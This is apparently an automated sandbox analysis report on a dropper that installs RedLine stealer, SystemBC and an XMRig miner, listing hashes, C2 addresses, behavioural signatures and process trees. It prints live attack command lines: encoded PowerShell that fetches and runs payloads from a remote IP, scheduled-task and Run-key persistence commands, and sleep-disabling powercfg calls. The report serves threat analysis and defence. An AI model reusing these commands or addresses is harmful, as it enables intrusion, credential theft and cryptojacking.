Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
04-05-2023 19:08
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
General
-
Target
tmp.exe
-
Size
95KB
-
MD5
92e79e8ed958f7289702c96fe03de5a5
-
SHA1
e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
-
SHA256
d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
-
SHA512
fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
-
SSDEEP
1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh
Malware Config
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Extracted
systembc
185.161.248.16:4440
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
OneDrive.exeOneDrive.exedescription pid process target process PID 2508 created 3156 2508 OneDrive.exe Explorer.EXE PID 2508 created 3156 2508 OneDrive.exe Explorer.EXE PID 2508 created 3156 2508 OneDrive.exe Explorer.EXE PID 3184 created 3156 3184 OneDrive.exe Explorer.EXE PID 3184 created 3156 3184 OneDrive.exe Explorer.EXE PID 3184 created 3156 3184 OneDrive.exe Explorer.EXE PID 3184 created 3156 3184 OneDrive.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3184-309-0x00007FF718F50000-0x00007FF71991A000-memory.dmp xmrig behavioral2/memory/636-317-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-321-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-325-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-330-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-335-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-339-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-343-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-347-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-351-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-355-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-359-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig behavioral2/memory/636-364-0x00007FF6D4520000-0x00007FF6D4D0F000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 1 3464 powershell.exe 2 2832 powershell.exe 3 2276 powershell.exe 31 2832 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
dllhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
lsass.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation lsass.exe -
Executes dropped EXE 5 IoCs
Processes:
OneDrive.exedllhost.exeOneDrive.exelsass.exelsass.exepid process 2508 OneDrive.exe 1952 dllhost.exe 3184 OneDrive.exe 2400 lsass.exe 4180 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Wine dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
lsass.exedllhost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" dllhost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
Processes:
dllhost.exelsass.exelsass.exepid process 1952 dllhost.exe 2400 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe 4180 lsass.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exepowershell.exeOneDrive.exedescription pid process target process PID 3464 set thread context of 4420 3464 powershell.exe RegSvcs.exe PID 2276 set thread context of 1444 2276 powershell.exe RegSvcs.exe PID 3184 set thread context of 3144 3184 OneDrive.exe conhost.exe PID 3184 set thread context of 636 3184 OneDrive.exe conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegSvcs.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4676 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
lsass.exepid process 4180 lsass.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exeRegSvcs.exedllhost.exeOneDrive.exepowershell.exepid process 3804 powershell.exe 3464 powershell.exe 2276 powershell.exe 2832 powershell.exe 3464 powershell.exe 3804 powershell.exe 2276 powershell.exe 2832 powershell.exe 2508 OneDrive.exe 2508 OneDrive.exe 2508 OneDrive.exe 2508 OneDrive.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 1444 RegSvcs.exe 1444 RegSvcs.exe 1952 dllhost.exe 1952 dllhost.exe 2508 OneDrive.exe 2508 OneDrive.exe 3184 OneDrive.exe 3184 OneDrive.exe 3184 OneDrive.exe 3184 OneDrive.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 1444 RegSvcs.exe 3184 OneDrive.exe 3184 OneDrive.exe 3184 OneDrive.exe 3184 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowercfg.exepowershell.exeConhost.exepowercfg.exepowercfg.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 3804 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 4420 RegSvcs.exe Token: SeShutdownPrivilege 1704 powercfg.exe Token: SeCreatePagefilePrivilege 1704 powercfg.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeShutdownPrivilege 5028 Conhost.exe Token: SeCreatePagefilePrivilege 5028 Conhost.exe Token: SeShutdownPrivilege 3596 powercfg.exe Token: SeCreatePagefilePrivilege 3596 powercfg.exe Token: SeShutdownPrivilege 3304 powercfg.exe Token: SeCreatePagefilePrivilege 3304 powercfg.exe Token: SeIncreaseQuotaPrivilege 4964 powershell.exe Token: SeSecurityPrivilege 4964 powershell.exe Token: SeTakeOwnershipPrivilege 4964 powershell.exe Token: SeLoadDriverPrivilege 4964 powershell.exe Token: SeSystemProfilePrivilege 4964 powershell.exe Token: SeSystemtimePrivilege 4964 powershell.exe Token: SeProfSingleProcessPrivilege 4964 powershell.exe Token: SeIncBasePriorityPrivilege 4964 powershell.exe Token: SeCreatePagefilePrivilege 4964 powershell.exe Token: SeBackupPrivilege 4964 powershell.exe Token: SeRestorePrivilege 4964 powershell.exe Token: SeShutdownPrivilege 4964 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeSystemEnvironmentPrivilege 4964 powershell.exe Token: SeRemoteShutdownPrivilege 4964 powershell.exe Token: SeUndockPrivilege 4964 powershell.exe Token: SeManageVolumePrivilege 4964 powershell.exe Token: 33 4964 powershell.exe Token: 34 4964 powershell.exe Token: 35 4964 powershell.exe Token: 36 4964 powershell.exe Token: SeIncreaseQuotaPrivilege 4964 powershell.exe Token: SeSecurityPrivilege 4964 powershell.exe Token: SeTakeOwnershipPrivilege 4964 powershell.exe Token: SeLoadDriverPrivilege 4964 powershell.exe Token: SeSystemProfilePrivilege 4964 powershell.exe Token: SeSystemtimePrivilege 4964 powershell.exe Token: SeProfSingleProcessPrivilege 4964 powershell.exe Token: SeIncBasePriorityPrivilege 4964 powershell.exe Token: SeCreatePagefilePrivilege 4964 powershell.exe Token: SeBackupPrivilege 4964 powershell.exe Token: SeRestorePrivilege 4964 powershell.exe Token: SeShutdownPrivilege 4964 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeSystemEnvironmentPrivilege 4964 powershell.exe Token: SeRemoteShutdownPrivilege 4964 powershell.exe Token: SeUndockPrivilege 4964 powershell.exe Token: SeManageVolumePrivilege 4964 powershell.exe Token: 33 4964 powershell.exe Token: 34 4964 powershell.exe Token: 35 4964 powershell.exe Token: 36 4964 powershell.exe Token: SeDebugPrivilege 1444 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 4964 powershell.exe Token: SeSecurityPrivilege 4964 powershell.exe Token: SeTakeOwnershipPrivilege 4964 powershell.exe Token: SeLoadDriverPrivilege 4964 powershell.exe Token: SeSystemProfilePrivilege 4964 powershell.exe Token: SeSystemtimePrivilege 4964 powershell.exe Token: SeProfSingleProcessPrivilege 4964 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
lsass.exelsass.exepid process 2400 lsass.exe 4180 lsass.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
tmp.exepowershell.exepowershell.exepowershell.execmd.execmd.exelsass.exeOneDrive.execmd.exedescription pid process target process PID 1044 wrote to memory of 3804 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 3804 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 3464 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 3464 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 2832 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 2832 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 2276 1044 tmp.exe powershell.exe PID 1044 wrote to memory of 2276 1044 tmp.exe powershell.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 3464 wrote to memory of 4420 3464 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2276 wrote to memory of 1444 2276 powershell.exe RegSvcs.exe PID 2832 wrote to memory of 2508 2832 powershell.exe OneDrive.exe PID 2832 wrote to memory of 2508 2832 powershell.exe OneDrive.exe PID 3704 wrote to memory of 1704 3704 cmd.exe powercfg.exe PID 3704 wrote to memory of 1704 3704 cmd.exe powercfg.exe PID 3704 wrote to memory of 5028 3704 cmd.exe Conhost.exe PID 3704 wrote to memory of 5028 3704 cmd.exe Conhost.exe PID 3704 wrote to memory of 3596 3704 cmd.exe powercfg.exe PID 3704 wrote to memory of 3596 3704 cmd.exe powercfg.exe PID 3704 wrote to memory of 3304 3704 cmd.exe powercfg.exe PID 3704 wrote to memory of 3304 3704 cmd.exe powercfg.exe PID 2832 wrote to memory of 1952 2832 powershell.exe dllhost.exe PID 2832 wrote to memory of 1952 2832 powershell.exe dllhost.exe PID 2832 wrote to memory of 1952 2832 powershell.exe dllhost.exe PID 2832 wrote to memory of 2400 2832 powershell.exe lsass.exe PID 2832 wrote to memory of 2400 2832 powershell.exe lsass.exe PID 2832 wrote to memory of 2400 2832 powershell.exe lsass.exe PID 4748 wrote to memory of 4668 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 4668 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 5068 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 5068 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 3864 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 3864 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 5084 4748 cmd.exe powercfg.exe PID 4748 wrote to memory of 5084 4748 cmd.exe powercfg.exe PID 2400 wrote to memory of 3992 2400 lsass.exe schtasks.exe PID 2400 wrote to memory of 3992 2400 lsass.exe schtasks.exe PID 2400 wrote to memory of 3992 2400 lsass.exe schtasks.exe PID 3184 wrote to memory of 3144 3184 OneDrive.exe conhost.exe PID 2400 wrote to memory of 4180 2400 lsass.exe lsass.exe PID 2400 wrote to memory of 4180 2400 lsass.exe lsass.exe PID 2400 wrote to memory of 4180 2400 lsass.exe lsass.exe PID 2400 wrote to memory of 368 2400 lsass.exe cmd.exe PID 2400 wrote to memory of 368 2400 lsass.exe cmd.exe PID 2400 wrote to memory of 368 2400 lsass.exe cmd.exe PID 368 wrote to memory of 4676 368 cmd.exe timeout.exe PID 368 wrote to memory of 4676 368 cmd.exe timeout.exe PID 368 wrote to memory of 4676 368 cmd.exe timeout.exe PID 3184 wrote to memory of 636 3184 OneDrive.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2508 -
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1952 -
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 19:14 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:3992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFF73.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:4676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4420 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5028
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964 -
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:4604
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4668
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5068
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3864
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5084
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2076 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3144
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:636
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3184
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
410B
MD524cfd42a8de70b38ed70e1f8cf4eda1c
SHA1e447168fd38da9175084b36a06c3e9bbde99064c
SHA25693b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA5125c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
1KB
MD5321756505d3ef828b22186c6b927a5fa
SHA1d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA51250fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2
-
Filesize
1KB
MD5321756505d3ef828b22186c6b927a5fa
SHA1d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA51250fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2
-
Filesize
1KB
MD53d3920894804fb6509067c1ef9d06998
SHA167a6c559865f021e947d790c0a46a40133853bcd
SHA256b608c0f42f316d08f5158f8dabe9de1b882a5a34252897df290a688bab468a20
SHA512336c28b367f621ab0768ffc164afe4b4137ced4e2ecc7e297a427183d68d25bc3ab3d8829a24d18f81a4b7f8a3874ae1988c65df20edc30713041cd02e16487f
-
Filesize
1KB
MD58b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1a9122eb088176912311fc0f8eb0b8f020693d259
SHA2568a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA51247e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
